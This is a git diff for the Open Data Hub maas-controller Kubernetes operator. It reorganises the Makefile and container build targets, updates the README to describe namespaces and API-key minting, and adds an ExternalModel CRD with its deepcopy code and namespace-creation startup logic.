+	@echo "\033[1mOptional build arguments\033[0m (e.g. \033[36mmake build GO_STRICTFIPS=true\033[0m):"
+	@echo "  \033[36mGO_STRICTFIPS=true\033[0m  strict FIPS runtime for \033[36mbuild\033[0m / \033[36mrun\033[0m / \033[36mbuild-image\033[0m / \033[36mbuild-image-konflux\033[0m"
+
+PROJECT_DIR := $(shell dirname $(abspath $(lastword $(MAKEFILE_LIST))))
+
+include tools.mk
+
+BINARY_NAME := manager
+BUILD_DIR := $(PROJECT_DIR)/bin
+
+# Go build environment (override on the CLI, e.g. make build GO_STRICTFIPS=true).
+# Strict FIPS uses GOEXPERIMENT=strictfipsruntime; keep CGO_ENABLED=1 for that path.
+GOOS   ?= $(shell go env GOOS)
+GOARCH ?= $(shell go env GOARCH)
+GO_STRICTFIPS ?= false
+
+CGO_ENABLED ?= 1
+
+ifeq ($(GO_STRICTFIPS),true)
+  GOEXPERIMENT ?= strictfipsruntime
+endif
+
+GO_ENV := GOOS=$(GOOS) GOARCH=$(GOARCH)
+ifdef GOEXPERIMENT
+  GO_ENV += GOEXPERIMENT=$(GOEXPERIMENT)
+endif
+ifdef CGO_ENABLED
+  GO_ENV += CGO_ENABLED=$(CGO_ENABLED)
+endif
 
 CONTROLLER_GEN_VERSION ?= v0.16.4
 CONTROLLER_GEN = $(BUILD_DIR)/controller-gen
 
-BINARY_NAME := manager
-BUILD_DIR := bin
-
-# Container build: use podman, buildah, or docker (default: podman if available, else buildah, else docker)
-CONTAINER_RUNTIME := $(shell command -v podman 1>/dev/null 2>&1 && echo podman || (command -v buildah 1>/dev/null 2>&1 && echo buildah || echo docker))
-# Default image
-IMAGE ?= quay.io/opendatahub/maas-controller
-IMAGE_TAG ?= latest
-FULL_IMAGE := $(IMAGE):$(IMAGE_TAG)
+##@ Development
 
-build: tidy $(BUILD_DIR)
-	go build -o $(BUILD_DIR)/$(BINARY_NAME) ./cmd/manager
+.PHONY: build
+build: tidy $(BUILD_DIR) ##	build manager binary to bin/manager
+	$(GO_ENV) go build -o $(BUILD_DIR)/$(BINARY_NAME) ./cmd/manager
 
 $(BUILD_DIR):
 	mkdir -p $(BUILD_DIR)
 
-run: build
-	./$(BUILD_DIR)/$(BINARY_NAME)
+.PHONY: run
+run: build ##	build and run manager locally
+	$(BUILD_DIR)/$(BINARY_NAME)
 
-test: tidy
+.PHONY: test
+test: tidy ##	run tests
 	go test ./...
 
+.PHONY: tidy
 tidy:
 	go mod tidy
 
@@ -48,16 +76,27 @@ tidy:
 $(CONTROLLER_GEN): | $(BUILD_DIR)
 	GOBIN=$(abspath $(BUILD_DIR)) go install sigs.k8s.io/controller-tools/cmd/controller-gen@$(CONTROLLER_GEN_VERSION)
 
-# Generate deepcopy code for API types
-generate: $(CONTROLLER_GEN)
+LINT_FIX ?= false
+.PHONY: lint
+lint: $(GOLANGCI_LINT) ##	run golangci-lint (use LINT_FIX=true to fix lint issues)
+ifeq ($(LINT_FIX),true)
+	$(GOLANGCI_LINT) fmt
+	$(GOLANGCI_LINT) run --fix
+else
+	$(GOLANGCI_LINT) fmt --diff
+	$(GOLANGCI_LINT) run
+endif
+
+.PHONY: generate
+generate: $(CONTROLLER_GEN) ##	generate deepcopy code for API types
 	$(CONTROLLER_GEN) object paths="./api/..."
 
-# Generate CRD manifests
-manifests: $(CONTROLLER_GEN)
+.PHONY: manifests
+manifests: $(CONTROLLER_GEN) ##	generate CRD manifests
 	$(CONTROLLER_GEN) crd paths="./api/..." output:crd:dir=../deployment/base/maas-controller/crd/bases
 
-# Run generate + manifests and verify no files changed (used by CI)
-verify-codegen: generate manifests
+.PHONY: verify-codegen
+verify-codegen: generate manifests ##	run generate + manifests and fail if files changed (CI check)
 	@if ! git diff --quiet HEAD -- api/ ../deployment/base/maas-controller/crd/bases/; then \
 		echo "ERROR: Generated files are out of date. Please run 'make generate manifests' and commit the results."; \
 		git diff --stat HEAD -- api/ ../deployment/base/maas-controller/crd/bases/; \
@@ -71,24 +110,16 @@ verify-codegen: generate manifests
 	fi
 	@echo "Generated files are up to date."
 
+##@ Deployment
+
 # Install CRDs, RBAC, and manager deployment (default: opendatahub namespace)
-install:
+.PHONY: install
+install: ##	apply deployment/base/maas-controller/default (CRDs, RBAC, deployment)
 	kubectl apply -k ../deployment/base/maas-controller/default
 
-uninstall:
+.PHONY: uninstall
+uninstall: ##	delete deployment/base/maas-controller/default resources
 	kubectl delete -k ../deployment/base/maas-controller/default --ignore-not-found
 
-# Build container image (podman, buildah, or docker)
-# buildah uses "bud" (build-using-dockerfile) instead of "build"
-BUILD_CMD := $(if $(filter buildah,$(CONTAINER_RUNTIME)),bud,build)
-image-build:
-	$(CONTAINER_RUNTIME) $(BUILD_CMD) -t $(FULL_IMAGE) --platform=linux/amd64 -f Dockerfile .
-	@echo "Built $(FULL_IMAGE) with $(CONTAINER_RUNTIME)"
-
-# Alias for image-build (backward compatibility)
-docker-build: image-build
-
-# Push image to registry (must be logged in, e.g. podman login quay.io)
-image-push: image-build
-	$(CONTAINER_RUNTIME) push $(FULL_IMAGE)
-	@echo "Pushed $(FULL_IMAGE)"
+## Container image
+include container.mk
diff --git a/maas-controller/README.md b/maas-controller/README.md
index 0386bc7d7..5c844abcb 100644
--- a/maas-controller/README.md
+++ b/maas-controller/README.md
@@ -35,8 +35,8 @@ Models with no MaaSAuthPolicy or MaaSSubscription are denied at the gateway leve
 ### CRDs and what they generate
 
 As MaaS API and controller are conventionally deployed in the operator namespace (e.g., `opendatahub`), MaaS CRs need to be separated so that they can be managed with lower cluster privileges. Therefore,
-- **MaasModelRef** is located in the same namespace as the **HTTPRoute** and **LLMInderenceService** it refers to; and
-- **MaaSAuthPolicy** and **MaaSSubscription** are located in a dedicated subscription namespace (default: `models-as-a-service`). Set `--maas-subscription-namespace` or the `MAAS_SUBSCRIPTION_NAMESPACE` env var in `maas-controller` deployment to use another namespace. MaaS controller will only watch and reconcile those CRs this configured namespace.
+- **MaaSModelRef** is located in the same namespace as the **HTTPRoute** and **LLMInferenceService** it refers to; and
+- **MaaSAuthPolicy** and **MaaSSubscription** are located in a dedicated subscription namespace (default: `models-as-a-service`). Set `--maas-subscription-namespace` or the `MAAS_SUBSCRIPTION_NAMESPACE` env var in `maas-controller` deployment to use another namespace. MaaS controller will only watch and reconcile those CRs in this configured namespace.
 
 | You create | Controller generates | Per | Targets |
 | ---------- | -------------------- | --- | ------- |
@@ -66,12 +66,12 @@ spec:
     kind: LLMInferenceService
     name: my-llmisvc
 ---
-# MaaSAuthPolicy in opendatahub namespace references model in llm namespace
+# MaaSAuthPolicy in models-as-a-service namespace references model in llm namespace
 apiVersion: maas.opendatahub.io/v1alpha1
 kind: MaaSAuthPolicy
 metadata:
   name: my-policy
-  namespace: opendatahub
+  namespace: models-as-a-service
 spec:
   modelRefs:
     - name: my-model
@@ -81,7 +81,7 @@ spec:
       - name: my-group
 ```
 
-The controller creates a Kuadrant **AuthPolicy** in the `llm` namespace (where the model and HTTPRoute exist), not in `opendatahub` (where the MaaSAuthPolicy lives).
+The controller creates a Kuadrant **AuthPolicy** in the `llm` namespace (where the model and HTTPRoute exist), not in `models-as-a-service` (where the MaaSAuthPolicy lives).
 
 **Same model name, different namespaces:**
 
@@ -99,7 +99,7 @@ spec:
 
 This creates two separate AuthPolicies: one in `team-a`, one in `team-b`.
 
-**Model list API:** When the MaaS controller is installed, the MaaS API **GET /v1/models** endpoint lists models by reading **MaaSModelRef** CRs (in the API's namespace). Each MaaSModelRef's `metadata.name` becomes the model `id`, and `status.endpoint` / `status.phase` supply the URL and readiness. So the set of MaaSModelRef objects is the source of truth for "which models are available" in MaaS. See [docs/content/configuration-and-management/model-listing-flow.md](../docs/content/configuration-and-management/model-listing-flow.md) in the repo for the full flow.
+**Model list API:** When the MaaS controller is installed, the MaaS API **GET /v1/models** endpoint lists models by reading **MaaSModelRef** CRs cluster-wide (all namespaces). Each MaaSModelRef's `metadata.name` becomes the model `id`, and `status.endpoint` / `status.phase` supply the URL and readiness. So the set of MaaSModelRef objects is the source of truth for "which models are available" in MaaS. See [docs/content/configuration-and-management/model-listing-flow.md](../docs/content/configuration-and-management/model-listing-flow.md) in the repo for the full flow.
 
 ### Model kinds and the provider pattern
 
@@ -182,12 +182,16 @@ deny-unsubscribed (0):        matches "NOT in premium-user AND NOT in free-user"
 
 ## Authentication
 
-Until API token minting is in place, the controller uses **OpenShift tokens directly** for inference:
+Create API keys with `POST /v1/api-keys` on the maas-api (authenticate with your OpenShift token). Each key is bound to one MaaSSubscription at mint time: set `"subscription": "<name>"` in the JSON body, or omit it and the platform selects the **highest-priority** accessible subscription (`MaaSSubscription.spec.priority`).
 
 ```bash
-export TOKEN=$(oc whoami -t)
-curl -H "Authorization: Bearer $TOKEN" \
-  "https://<gateway-host>/llm/<model-name>/v1/chat/completions" \
+MAAS_API="https://<gateway-host>/maas-api"
+API_KEY=$(curl -sSk -H "Authorization: Bearer $(oc whoami -t)" -H "Content-Type: application/json" \
+  -X POST -d '{"name":"demo","subscription":"<maas-subscription-name>"}' \
+  "${MAAS_API}/v1/api-keys" | jq -r .key)
+
+curl -sSk "https://<gateway-host>/llm/<model-name>/v1/chat/completions" \
+  -H "Authorization: Bearer ${API_KEY}" \
   -H "Content-Type: application/json" \
   -d '{"model":"<model>","messages":[{"role":"user","content":"Hello"}],"max_tokens":10}'
 ```
@@ -256,8 +260,8 @@ kubectl get crd | grep maas.opendatahub.io
 Install both **regular** and **premium** simulator models and their MaaS policies/subscriptions (from the repository root):
 
 ```bash
+# Create model namespace (models-as-a-service namespace is auto-created by controller)
 kubectl create namespace llm --dry-run=client -o yaml | kubectl apply -f -
-kubectl create namespace models-as-a-service --dry-run=client -o yaml | kubectl apply -f -
 kustomize build docs/samples/maas-system | kubectl apply -f -
 ```
 
@@ -266,13 +270,13 @@ This creates:
 ### Regular tier
 
 - `LLMInferenceService/facebook-opt-125m-simulated` in `llm` namespace
-- `MaaSModelRef/facebook-opt-125m-simulated` in `opendatahub`
+- `MaaSModelRef/facebook-opt-125m-simulated` in `llm`
 - `MaaSAuthPolicy/simulator-access` (group: `free-user`) and `MaaSSubscription/simulator-subscription` (100 tokens/min) in `models-as-a-service`
 
 ### Premium tier
 
 - `LLMInferenceService/premium-simulated-simulated-premium` in `llm` namespace
-- `MaaSModelRef/premium-simulated-simulated-premium` in `opendatahub`
+- `MaaSModelRef/premium-simulated-simulated-premium` in `llm`
 - `MaaSAuthPolicy/premium-simulator-access` (group: `premium-user`) and `MaaSSubscription/premium-simulator-subscription` (1000 tokens/min) in `models-as-a-service`
 
 Replace `free-user` and `premium-user` in the example CRs with groups from your identity provider.
@@ -281,7 +285,7 @@ Then verify:
 
 ```bash
 # Check CRs
-kubectl get maasmodelref -n opendatahub
+kubectl get maasmodelref -n llm
 kubectl get maasauthpolicy,maassubscription -n models-as-a-service
 
 # Check generated Kuadrant policies
@@ -289,22 +293,29 @@ kubectl get authpolicy,tokenratelimitpolicy -n llm
 
 # Test inference (set GATEWAY_HOST and TOKEN once)
 GATEWAY_HOST="maas.$(kubectl get ingresses.config.openshift.io cluster -o jsonpath='{.spec.domain}')"
+MAAS_API="https://${GATEWAY_HOST}/maas-api"
 TOKEN=$(oc whoami -t)
 
-# Regular model: 401 without auth, 200 with auth (user must be in free-user)
+# Regular tier: log in as a user in free-user, then mint a key for simulator-subscription
+FREE_API_KEY=$(curl -sSk -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" \
+  -X POST -d '{"name":"readme-free","subscription":"simulator-subscription"}' \
+  "${MAAS_API}/v1/api-keys" | jq -r .key)
+
 curl -sSk -o /dev/null -w "%{http_code}\n" "https://${GATEWAY_HOST}/llm/facebook-opt-125m-simulated/v1/chat/completions" \
   -H "Content-Type: application/json" -d '{"model":"facebook/opt-125m","messages":[{"role":"user","content":"Hi"}],"max_tokens":5}'
 curl -sSk -o /dev/null -w "%{http_code}\n" "https://${GATEWAY_HOST}/llm/facebook-opt-125m-simulated/v1/chat/completions" \
-  -H "Authorization: Bearer $TOKEN" \
-  -H "x-maas-subscription: simulator-subscription" \
+  -H "Authorization: Bearer $FREE_API_KEY" \
   -H "Content-Type: application/json" -d '{"model":"facebook/opt-125m","messages":[{"role":"user","content":"Hi"}],"max_tokens":5}'
 
-# Premium model: 401 without auth, 200 with auth (user must be in premium-user)
+# Premium tier: log in as a user in premium-user, mint a key for premium-simulator-subscription, then call the premium route
+PREMIUM_API_KEY=$(curl -sSk -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" \
+  -X POST -d '{"name":"readme-premium","subscription":"premium-simulator-subscription"}' \
+  "${MAAS_API}/v1/api-keys" | jq -r .key)
+
 curl -sSk -o /dev/null -w "%{http_code}\n" "https://${GATEWAY_HOST}/llm/premium-simulated-simulated-premium/v1/chat/completions" \
   -H "Content-Type: application/json" -d '{"model":"facebook/opt-125m","messages":[{"role":"user","content":"Hi"}],"max_tokens":5}'
 curl -sSk -o /dev/null -w "%{http_code}\n" "https://${GATEWAY_HOST}/llm/premium-simulated-simulated-premium/v1/chat/completions" \
-  -H "Authorization: Bearer $TOKEN" \
-  -H "x-maas-subscription: premium-simulator-subscription" \
+  -H "Authorization: Bearer $PREMIUM_API_KEY" \
   -H "Content-Type: application/json" -d '{"model":"facebook/opt-125m","messages":[{"role":"user","content":"Hi"}],"max_tokens":5}'
 ```
 
diff --git a/maas-controller/api/maas/v1alpha1/externalmodel_types.go b/maas-controller/api/maas/v1alpha1/externalmodel_types.go
new file mode 100644
index 000000000..3f58053b7
--- /dev/null
+++ b/maas-controller/api/maas/v1alpha1/externalmodel_types.go
@@ -0,0 +1,86 @@
+/*
+Copyright 2025.
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+    http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+*/
+
+package v1alpha1
+
+import (
+	metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
+)
+
+// ExternalModelSpec defines the desired state of ExternalModel
+type ExternalModelSpec struct {
+	// Provider identifies the API format and auth type for the external model.
+	// e.g. "openai", "anthropic".
+	// +kubebuilder:validation:Required
+	// +kubebuilder:validation:MaxLength=63
+	Provider string `json:"provider"`
+
+	// Endpoint is the FQDN of the external provider (no scheme or path).
+	// e.g. "api.openai.com".
+	// This field is metadata for downstream consumers (e.g. BBR provider-resolver plugin)
+	// and is not used by the controller for endpoint derivation.
+	// +kubebuilder:validation:Required
+	// +kubebuilder:validation:MaxLength=253
+	// +kubebuilder:validation:Pattern=`^[a-zA-Z0-9]([a-zA-Z0-9\-]*[a-zA-Z0-9])?(\.[a-zA-Z0-9]([a-zA-Z0-9\-]*[a-zA-Z0-9])?)*$`
+	Endpoint string `json:"endpoint"`
+
+	// CredentialRef references a Kubernetes Secret containing the provider API key.
+	// The Secret must contain a data key "api-key" with the credential value.
+	// +kubebuilder:validation:Required
+	CredentialRef CredentialReference `json:"credentialRef"`
+}
+
+// ExternalModelStatus defines the observed state of ExternalModel
+type ExternalModelStatus struct {
+	// Phase represents the current phase of the external model
+	// +kubebuilder:validation:Enum=Pending;Ready;Failed
+	Phase string `json:"phase,omitempty"`
+
+	// Conditions represent the latest available observations of the external model's state
+	// +optional
+	Conditions []metav1.Condition `json:"conditions,omitempty"`
+}
+
+//+kubebuilder:object:root=true
+//+kubebuilder:subresource:status
+//+kubebuilder:printcolumn:name="Provider",type="string",JSONPath=".spec.provider"
+//+kubebuilder:printcolumn:name="Endpoint",type="string",JSONPath=".spec.endpoint"
+//+kubebuilder:printcolumn:name="Phase",type="string",JSONPath=".status.phase"
+//+kubebuilder:printcolumn:name="Age",type="date",JSONPath=".metadata.creationTimestamp"
+
+// ExternalModel is the Schema for the externalmodels API.
+// It defines an external LLM provider (e.g., OpenAI, Anthropic) that can be
+// referenced by MaaSModelRef resources.
+type ExternalModel struct {
+	metav1.TypeMeta   `json:",inline"`
+	metav1.ObjectMeta `json:"metadata,omitempty"`
+
+	Spec   ExternalModelSpec   `json:"spec,omitempty"`
+	Status ExternalModelStatus `json:"status,omitempty"`
+}
+
+//+kubebuilder:object:root=true
+
+// ExternalModelList contains a list of ExternalModel
+type ExternalModelList struct {
+	metav1.TypeMeta `json:",inline"`
+	metav1.ListMeta `json:"metadata,omitempty"`
+	Items           []ExternalModel `json:"items"`
+}
+
+func init() {
+	SchemeBuilder.Register(&ExternalModel{}, &ExternalModelList{})
+}
diff --git a/maas-controller/api/maas/v1alpha1/maasmodelref_types.go b/maas-controller/api/maas/v1alpha1/maasmodelref_types.go
index 1679e972f..b5ab63739 100644
--- a/maas-controller/api/maas/v1alpha1/maasmodelref_types.go
+++ b/maas-controller/api/maas/v1alpha1/maasmodelref_types.go
@@ -31,13 +31,29 @@ type MaaSModelSpec struct {
 	EndpointOverride string `json:"endpointOverride,omitempty"`
 }
 
-// ModelReference references a model endpoint in the same namespace
+// CredentialReference references a Kubernetes Secret with provider API credentials.
+// The Secret must be in the same namespace as the ExternalModel.
+type CredentialReference struct {
+	// Name is the name of the Secret
+	// +kubebuilder:validation:MinLength=1
+	// +kubebuilder:validation:MaxLength=253
+	Name string `json:"name"`
+}
+
+// ModelReference references a model endpoint in the same namespace.
+// For kind=ExternalModel, the Name field references an ExternalModel CR in the same namespace.
 type ModelReference struct {
-	// Kind determines which fields are available
+	// Kind determines which backend handles this model reference.
+	// LLMInferenceService: references a KServe LLMInferenceService.
+	// ExternalModel: references an ExternalModel CR containing provider config.
 	// +kubebuilder:validation:Enum=LLMInferenceService;ExternalModel
 	Kind string `json:"kind"`
 
-	// Name is the name of the model resource
+	// Name is the name of the model resource.
+	// For LLMInferenceService, this is the InferenceService name.
+	// For ExternalModel, this is the ExternalModel CR name.
+	// +kubebuilder:validation:MinLength=1
+	// +kubebuilder:validation:MaxLength=253
 	Name string `json:"name"`
 }
 
diff --git a/maas-controller/api/maas/v1alpha1/zz_generated.deepcopy.go b/maas-controller/api/maas/v1alpha1/zz_generated.deepcopy.go
index 4b5f91bbd..683a6ae68 100644
--- a/maas-controller/api/maas/v1alpha1/zz_generated.deepcopy.go
+++ b/maas-controller/api/maas/v1alpha1/zz_generated.deepcopy.go
@@ -39,6 +39,118 @@ func (in *BillingRate) DeepCopy() *BillingRate {
 	return out
 }
 
+// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
+func (in *CredentialReference) DeepCopyInto(out *CredentialReference) {
+	*out = *in
+}
+
+// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new CredentialReference.
+func (in *CredentialReference) DeepCopy() *CredentialReference {
+	if in == nil {
+		return nil
+	}
+	out := new(CredentialReference)
+	in.DeepCopyInto(out)
+	return out
+}
+
+// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
+func (in *ExternalModel) DeepCopyInto(out *ExternalModel) {
+	*out = *in
+	out.TypeMeta = in.TypeMeta
+	in.ObjectMeta.DeepCopyInto(&out.ObjectMeta)
+	out.Spec = in.Spec
+	in.Status.DeepCopyInto(&out.Status)
+}
+
+// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ExternalModel.
+func (in *ExternalModel) DeepCopy() *ExternalModel {
+	if in == nil {
+		return nil
+	}
+	out := new(ExternalModel)
+	in.DeepCopyInto(out)
+	return out
+}
+
+// DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object.
+func (in *ExternalModel) DeepCopyObject() runtime.Object {
+	if c := in.DeepCopy(); c != nil {
+		return c
+	}
+	return nil
+}
+
+// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
+func (in *ExternalModelList) DeepCopyInto(out *ExternalModelList) {
+	*out = *in
+	out.TypeMeta = in.TypeMeta
+	in.ListMeta.DeepCopyInto(&out.ListMeta)
+	if in.Items != nil {
+		in, out := &in.Items, &out.Items
+		*out = make([]ExternalModel, len(*in))
+		for i := range *in {
+			(*in)[i].DeepCopyInto(&(*out)[i])
+		}
+	}
+}
+
+// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ExternalModelList.
+func (in *ExternalModelList) DeepCopy() *ExternalModelList {
+	if in == nil {
+		return nil
+	}
+	out := new(ExternalModelList)
+	in.DeepCopyInto(out)
+	return out
+}
+
+// DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object.
+func (in *ExternalModelList) DeepCopyObject() runtime.Object {
+	if c := in.DeepCopy(); c != nil {
+		return c
+	}
+	return nil
+}
+
+// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
+func (in *ExternalModelSpec) DeepCopyInto(out *ExternalModelSpec) {
+	*out = *in
+	out.CredentialRef = in.CredentialRef
+}
+
+// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ExternalModelSpec.
+func (in *ExternalModelSpec) DeepCopy() *ExternalModelSpec {
+	if in == nil {
+		return nil
+	}
+	out := new(ExternalModelSpec)
+	in.DeepCopyInto(out)
+	return out
+}
+
+// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
+func (in *ExternalModelStatus) DeepCopyInto(out *ExternalModelStatus) {
+	*out = *in
+	if in.Conditions != nil {
+		in, out := &in.Conditions, &out.Conditions
+		*out = make([]v1.Condition, len(*in))
+		for i := range *in {
+			(*in)[i].DeepCopyInto(&(*out)[i])
+		}
+	}
+}
+
+// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ExternalModelStatus.
+func (in *ExternalModelStatus) DeepCopy() *ExternalModelStatus {
+	if in == nil {
+		return nil
+	}
+	out := new(ExternalModelStatus)
+	in.DeepCopyInto(out)
+	return out
+}
+
 // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
 func (in *GroupReference) DeepCopyInto(out *GroupReference) {
 	*out = *in
diff --git a/maas-controller/cmd/manager/main.go b/maas-controller/cmd/manager/main.go
index 2c284fc45..528da45c8 100644
--- a/maas-controller/cmd/manager/main.go
+++ b/maas-controller/cmd/manager/main.go
@@ -17,11 +17,22 @@ limitations under the License.
 package main
 
 import (
+	"context"
 	"flag"
+	"fmt"
 	"os"
+	"time"
 
+	corev1 "k8s.io/api/core/v1"
+	"k8s.io/apimachinery/pkg/api/errors"
+	metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
+	"k8s.io/apimachinery/pkg/apis/meta/v1/unstructured"
 	"k8s.io/apimachinery/pkg/runtime"
+	"k8s.io/apimachinery/pkg/runtime/schema"
+	"k8s.io/apimachinery/pkg/types"
 	utilruntime "k8s.io/apimachinery/pkg/util/runtime"
+	"k8s.io/apimachinery/pkg/util/wait"
+	"k8s.io/client-go/kubernetes"
 	clientgoscheme "k8s.io/client-go/kubernetes/scheme"
 	ctrl "sigs.k8s.io/controller-runtime"
 	"sigs.k8s.io/controller-runtime/pkg/cache"
@@ -48,6 +59,86 @@ func init() {
 	utilruntime.Must(maasv1alpha1.AddToScheme(scheme))
 }
 
+// ensureSubscriptionNamespaceExists checks whether the subscription namespace exists
+// and creates it if missing. It checks for existence first so that the controller can
+// start even when the service account lacks namespace-create permission (common in
+// operator-managed deployments where the operator pre-creates the namespace).
+// Permanent errors such as Forbidden are not retried.
+func ensureSubscriptionNamespaceExists(ctx context.Context, namespace string) error {
+	cfg := ctrl.GetConfigOrDie()
+	clientset, err := kubernetes.NewForConfig(cfg)
+	if err != nil {
+		return fmt.Errorf("unable to create Kubernetes client: %w", err)
+	}
+
+	_, err = clientset.CoreV1().Namespaces().Get(ctx, namespace, metav1.GetOptions{})
+	if err == nil {
+		setupLog.Info("subscription namespace already exists", "namespace", namespace)
+		return nil
+	}
+	if !errors.IsNotFound(err) {
+		return fmt.Errorf("unable to check if namespace %q exists: %w", namespace, err)
+	}
+
+	setupLog.Info("subscription namespace not found, attempting to create it", "namespace", namespace)
+	return wait.ExponentialBackoffWithContext(ctx, wait.Backoff{
+		Steps:    5,
+		Duration: 1 * time.Second,
+		Factor:   2.0,
+	}, func(ctx context.Context) (bool, error) {
+		ns := &corev1.Namespace{
+			ObjectMeta: metav1.ObjectMeta{
+				Name: namespace,
+				Labels: map[string]string{
+					"opendatahub.io/generated-namespace": "true",
+				},
+			},
+		}
+
+		_, err := clientset.CoreV1().Namespaces().Create(ctx, ns, metav1.CreateOptions{})
+		if err == nil || errors.IsAlreadyExists(err) {
+			setupLog.Info("subscription namespace ready", "namespace", namespace)
+			return true, nil
+		}
+		if errors.IsForbidden(err) {
+			return false, fmt.Errorf("service account lacks permission to create namespace %q — "+
+				"either pre-create the namespace or grant 'create' on namespaces to the controller service account: %w",
+				namespace, err)
+		}
+		setupLog.Info("retrying namespace creation", "namespace", namespace, "error", err)
+		return false, nil // transient error, retry
+	})
+}
+
+// getClusterServiceAccountIssuer fetches the cluster's service account issuer from OpenShift/ROSA configuration.
+// Returns empty string if not found or not running on OpenShift/ROSA.
+// Uses client.Reader (not client.Client) so it can be called before the manager cache starts.
+func getClusterServiceAccountIssuer(c client.Reader) (string, error) {
+	// Try to fetch the OpenShift Authentication config resource
+	// This works on OpenShift/ROSA but not on vanilla Kubernetes
+	authConfig := &unstructured.Unstructured{}
+	authConfig.SetGroupVersionKind(schema.GroupVersionKind{
+		Group:   "config.openshift.io",
+		Version: "v1",
+		Kind:    "Authentication",
+	})
+
+	if err := c.Get(context.Background(), types.NamespacedName{Name: "cluster"}, authConfig); err != nil {
+		return "", err
+	}
+
+	// Extract spec.serviceAccountIssuer
+	issuer, found, err := unstructured.NestedString(authConfig.Object, "spec", "serviceAccountIssuer")
+	if err != nil {
+		return "", err
+	}
+	if !found || issuer == "" {
+		return "", nil
+	}
+
+	return issuer, nil
+}
+
 func main() {
 	var metricsAddr string
 	var enableLeaderElection bool
@@ -74,6 +165,12 @@ func main() {
 
 	ctrl.SetLogger(zap.New(zap.UseFlagOptions(&opts)))
 
+	// Ensure subscription namespace exists before starting controllers
+	if err := ensureSubscriptionNamespaceExists(context.Background(), maasSubscriptionNamespace); err != nil {
+		setupLog.Error(err, "unable to ensure subscription namespace exists", "namespace", maasSubscriptionNamespace)
+		os.Exit(1)
+	}
+
 	setupLog.Info("watching namespace for MaaS AuthPolicy and MaaSSubscription", "namespace", maasSubscriptionNamespace)
 	cacheOpts := cache.Options{
 		ByObject: map[client.Object]cache.ByObject{
@@ -95,6 +192,17 @@ func main() {
 		os.Exit(1)
 	}
 
+	// Auto-detect cluster audience from OpenShift/ROSA if using default value
+	// Use GetAPIReader() instead of GetClient() because the cache hasn't started yet
+	if clusterAudience == "https://kubernetes.default.svc" {
+		if detectedAudience, err := getClusterServiceAccountIssuer(mgr.GetAPIReader()); err == nil && detectedAudience != "" {
+			setupLog.Info("auto-detected cluster service account issuer", "audience", detectedAudience)
+			clusterAudience = detectedAudience
+		} else if err != nil {
+			setupLog.Info("unable to auto-detect cluster service account issuer, using default", "error", err, "default", clusterAudience)
+		}
+	}
+
 	if err := (&maas.MaaSModelRefReconciler{
 		Client:           mgr.GetClient(),
 		Scheme:           mgr.GetScheme(),
diff --git a/maas-controller/container.mk b/maas-controller/container.mk
new file mode 100644
index 000000000..5da4bf6c4
--- /dev/null
+++ b/maas-controller/container.mk
@@ -0,0 +1,34 @@
+## Container image configuration and targets
+
+CONTAINER_ENGINE ?= podman
+REPO ?= quay.io/opendatahub/maas-controller
+TAG ?= latest
+FULL_IMAGE ?= $(REPO):$(TAG)
+
+DOCKER_BUILD_ARGS := --build-arg CGO_ENABLED=$(CGO_ENABLED)
+ifdef GOEXPERIMENT
+  DOCKER_BUILD_ARGS += --build-arg GOEXPERIMENT=$(GOEXPERIMENT)
+endif
+
+##@ Build
+
+.PHONY: build-image
+build-image: ##	Build container image (use REPO= and TAG= to specify image)
+	@echo "Building container image $(FULL_IMAGE)..."
+	$(CONTAINER_ENGINE) build $(DOCKER_BUILD_ARGS) $(CONTAINER_ENGINE_EXTRA_FLAGS) -t "$(FULL_IMAGE)" .
+	@echo "Container image $(FULL_IMAGE) built successfully"
+
+.PHONY: build-image-konflux
+build-image-konflux: ##	Build container image with Dockerfile.konflux
+	@echo "Building container image $(FULL_IMAGE) using Dockerfile.konflux..."
+	$(CONTAINER_ENGINE) build $(DOCKER_BUILD_ARGS) $(CONTAINER_ENGINE_EXTRA_FLAGS) -f Dockerfile.konflux -t "$(FULL_IMAGE)" .
+	@echo "Container image $(FULL_IMAGE) built successfully"
+
+.PHONY: push-image
+push-image: ##	Push container image (use REPO= and TAG= to specify image)
+	@echo "Pushing container image $(FULL_IMAGE)..."
+	@$(CONTAINER_ENGINE) push "$(FULL_IMAGE)"
+	@echo "Container image $(FULL_IMAGE) pushed successfully"
+
+.PHONY: build-push-image ## Build and push container image
+build-push-image: build-image push-image
diff --git a/maas-controller/docs/old-vs-new-flow.md b/maas-controller/docs/old-vs-new-flow.md
index 734237aef..a26d39dc3 100644
--- a/maas-controller/docs/old-vs-new-flow.md
+++ b/maas-controller/docs/old-vs-new-flow.md
@@ -98,7 +98,7 @@ Model Endpoint
 
 | Resource | Namespace | Created by | Purpose |
 |----------|-----------|------------|---------|
-| MaaSModelRef | opendatahub | User/admin | Registers a model with MaaS |
+| MaaSModelRef | Same as model (e.g. `llm`) | User/admin | Registers a model with MaaS |
 | MaaSAuthPolicy | models-as-a-service | User/admin | Defines who (groups) can access which models |
 | MaaSSubscription | models-as-a-service | User/admin | Defines per-model token rate limits for owner groups |
